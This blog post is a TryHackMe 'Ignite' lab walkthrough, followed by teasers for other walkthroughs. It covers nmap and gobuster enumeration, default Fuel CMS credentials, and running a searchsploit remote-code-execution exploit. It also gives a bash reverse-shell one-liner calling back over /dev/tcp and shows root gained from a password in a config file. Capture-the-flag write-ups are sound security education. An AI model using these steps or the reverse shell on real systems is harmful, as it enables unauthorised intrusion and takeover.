[ Ignite ] - TRYHACKME (Detailed)

By -

   


Let’s dive in!!  And root the machine.

Nmap Scan - tryhackme
------------------------------------------------------------------------------------------------------------------


nmap -sC -sV  -oN nmap/ignite <TARGET_IP>

-sC : Default scripts
-sV : Version detection
-oN : Output to be stored in the directory ‘nmap’ you created earlier


There is only one open port
80/tcp http Apache httpd 2.4.18 ((Ubuntu))

Gobuster
--------------------------------------------------------------------------------------------------------------------------
gobuster dir -u http://<TARGET_IP> -w <PATH_TO_WORDLIST> -o <OUTPUT_FILE_NAME> -x <EXTENSIONS>

-u : URL
-w : Wordlist
-o : Output to be stored in the directory
-x : Search for extensions e.g. html,txt,php,phtml etc.



Navigate to http://<target_ip>



scroll down we will find default credentials to login into the CMS 


Navigate to http://<TARGET_IP>/robots.txt



I checked them one by one they redirect to the same page which is fuel cms default page. But i found /fuel/ in the robots.txt 

Navigate to http://<Target_IP>/fuel/


Now we have login page and also we have default username and password  and we have Dashboard fuel CMS

We can try using unpopular extensions e.g. phtml, phtml5 etc. in order to bypass the uploads but it still won’t work. Nevermind we will find our way in somehow.

searchsploit will help to find the exploit of the fuel CMS.

searchsploit <EXPLOIT>
Additionally we can also use flags in searchsploit to examine and to download the exploit on the host machine.
searchsploit -m <PATH_OF_EXPLOIT> — download
searchsploit -x <PATH_OF_EXPLOIT> — examine


Seems like there is one interesting exploit that is Fuel CMS 1.41 remote code execution.


Let's modify the RCE using nano there is a url remove pre-written IP and set to target IP.
Saving the exploit, we can execute the exploit and let's see if the RCE works.

Great!! The exploit successfully worked and we got a cmd prompt where we can input or execute commands on the target system.
We need to gain reverse  shell on the target system and for that purpose. We can use bash reverse shell for gaining target shell.

/bin/bash -i >& /dev/tcp/<Your_TryHackMe_IP>/9003 0>&1

Netcat Listener on machine.


And Great !!!! We have reverse shell of the target machine but we need to stable the shell for working on bash or sh.


python -c ‘import pty;pty.spawn(“/bin/bash”)’
Ctrl+Z
stty raw -echo
fg
export TERM=xterm
export SHELL=bash

Let's hunt the flags.



Done. Submit the flag and now we have to escalate the privileges on the system to gain root access and get the root.txt flag.

Usually CMS contains configuration files with extremely important information and we can navigate to the config file stored in the /var/www/html/ and try to find anything which contains the passwords or anything important. If we cannot find anything in the config file then we can go for linpeas or linenum to find out the potential attack vector for highest privilege escalation.


Inspect the config file.



Great!! We have obtained the password for root therefore we can try logging in as root by using the ‘su root’ command.



Great!! We have successfully escalated the privileges and we can confirm we are root now.
Capture the root flag and submit.



And we are done with this box. 😉

Hello World!! I am Mayank Srivastava and i am graduated in computer application from Veer Bahadur Singh Purvanchal University. And I post tutorials on programming languages. I'd like to share some of my knowledge with everyone. And also i am interested in Cyber Security Penetration Testing.

Comments

Post a Comment

Popular posts from this blog

[ Blue ] - TRYHACKME

By -
Image
Hello guys Today i am going to do walkthrough on the machine called Blue. This is very easy box based on the vulnerability of EternalBlue( CVE-2017-0143 ). As usual first thing we are going to do is scanning the network using the nmap tool to see which ports are open and which services are running on this machine. The flags used in the nmap scan are: -sS - for a syn scan -sV -for a service version scan -O - to identify the OS used -T4 - the speed of scan -open - to show only the open ports We notice the service running on the port 445 is SMB so we can use nmap script engine to verify this service is vulnerable or not for EternalBlue vulnerability. The flags used are: -p - to test only the port provided(in this case 445) --script=smb-vuln-ms17-010 - the nmap script to run against our target The output of the scan is shown us to machine is vulnerable. Metasploit already has this exploit, so let's fire it up to gain access. To start the metasploit console just run the command msfco...
Read more

[ The Cod Caper ] - TRYHACKME

By -
Image
    Check out the room https://tryhackme.com/room/thecodcaper Hello everyone  this is another walkthrough blog of tryhackme, this room contains some trick to crack the linux machines root password. Room name : The Cod Caper Machine Type : Linux Task 2  We'll run nmap on the target # nmap -sV -A -p1-1000 -T4 -oN initial <target-machine-ip> Task 3 As recommended in tryhackme the cod caper room we'll use  gobuster  for the directory checking the wordlist for  gobuster  is in the task for downloading. Don't forget to user  -x  flag for specific extension search like ". html, .txt, .php " # gobuster dir -u <target_url> -w "path/of/wordlist" -x ".php" -x flag is important because we have to check the specific extension like ".html, .php" After gobuster directory bruteforcing we have admin page for login but we don't have username and password for login so we have to find the username and password to access the page. Task 4 W...
Read more

[ Basics Penetration Testing ] - TRYHACKME

By -
Image
[ Basics Penetration Testing ] - TRYHACKME.COM   This article is for basics penetration testing  1. Deploy the machine and connect to the tryhackme network. 2. Find the service exposed by the machine. For finding the service here we can use nmap  nmap -sC -sV -oN initial <machine_ip> # Nmap 7.80 scan initiated Sun Sep 27 11:26:39 2020 as: nmap -sC -sV -oN initial 10.10.38.194 Nmap scan report for 10.10 .38.196 Host is up ( 0 .077s latency ) . Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 7 .2p2 Ubuntu 4ubuntu2.4 ( Ubuntu Linux ; protocol 2.0 ) | ssh-hostkey: | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 ( RSA ) | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce ( ECDSA ) | _ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 ( ED25519 ) 139 /tcp open netbios-ssn Samba smbd 3 .X - 4 .X ( workgroup: WORKGROUP ) 445 /tcp open netbios-ssn Samba smbd 4.3 .11-Ubuntu ( workgroup: WORKGROUP ...
Read more